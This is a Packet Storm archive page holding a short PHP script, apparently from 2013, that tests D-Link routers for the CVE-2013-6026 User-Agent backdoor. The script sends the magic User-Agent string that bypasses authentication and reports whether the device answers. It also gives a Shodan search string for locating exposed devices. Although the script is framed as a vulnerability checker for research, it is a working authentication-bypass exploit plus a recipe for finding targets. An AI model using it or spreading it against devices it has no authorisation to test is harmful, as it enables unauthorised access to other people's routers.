exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

D-Link Backdoor Czechr

D-Link Backdoor Czechr
Posted Oct 30, 2013
Authored by dustyfresh

This is a simple PHP script that checks to see if your D-Link device is vulnerable to the User-Agent backdoor.

tags | exploit, php
SHA-256 | b0f9b07e55de0f72f7056f20fafc5118ca5dbd0af300d0146663b52ab3d742d7

D-Link Backdoor Czechr

Change Mirror Download
#!/usr/bin/php
<?php
/*
.---------------------------------.
| |
| dlinkd - D-link backdoor czechr |
| |
.-------------------------------------------------------------------------------.
| Written by @dustyfresh - 10/13 |
.-------------------------------------------------------------------------------.
| See: http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/
| http://www.security-database.com/detail.php?alert=CVE-2013-6026
| Usage(command-line only):
| ./dlinkd http://192.168.1.1:8080/
| Shodan dork:
| thttpd-alphanetworks/2.23
.-------------------------------------------------------------------------------.
| Educational purposes only, kkthnx. |
| http://rootatx.com/ || http://staypimp.in/ |
.-------------------------------------------------------------------------------.
| GNU GENERAL PUBLIC LICENSE
|
| Version 3, 29 June 2007
|
| Copyright © 2007 Free Software Foundation, Inc. <http://fsf.org/>
| Everyone is permitted to copy and distribute verbatim copies of this license
| document, but changing it is not allowed.
|
| http://www.gnu.org/licenses/gpl.html
.-------------------------------------------------------------------------------.
*/
error_reporting(1);
set_time_limit(0); // ain't nobody got time fo' dat
$help = "\t--help, this help menu\n\nexample: ./dlinkd http://192.168.1.1:8080\n";
$host = $argv[1];
$curl = curl_init($host);
$swag = array(
CURLOPT_HEADER => 'true',
CURLOPT_POST => 'true',
CURLOPT_USERAGENT => 'xmlset_roodkcableoj28840ybtide', // the secret ingredient
CURLOPT_RETURNTRANSFER => 1
);
curl_setopt_array($curl,$swag);
switch($argv[1]){
case NULL:
die($help);
break;
case "--help":
die($help);
break;
}
$sup = curl_exec($curl);
$return = curl_getinfo($curl);
curl_close($curl);
$exit = $return['http_code'];
if($exit != 200){
print "[$host] :( This door is locked.\n";
} else {
print "THIS IS A TRIUMPH! [$host] is vulnerable\n";
// 'murica, ah'll tell u whut
}
?>

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close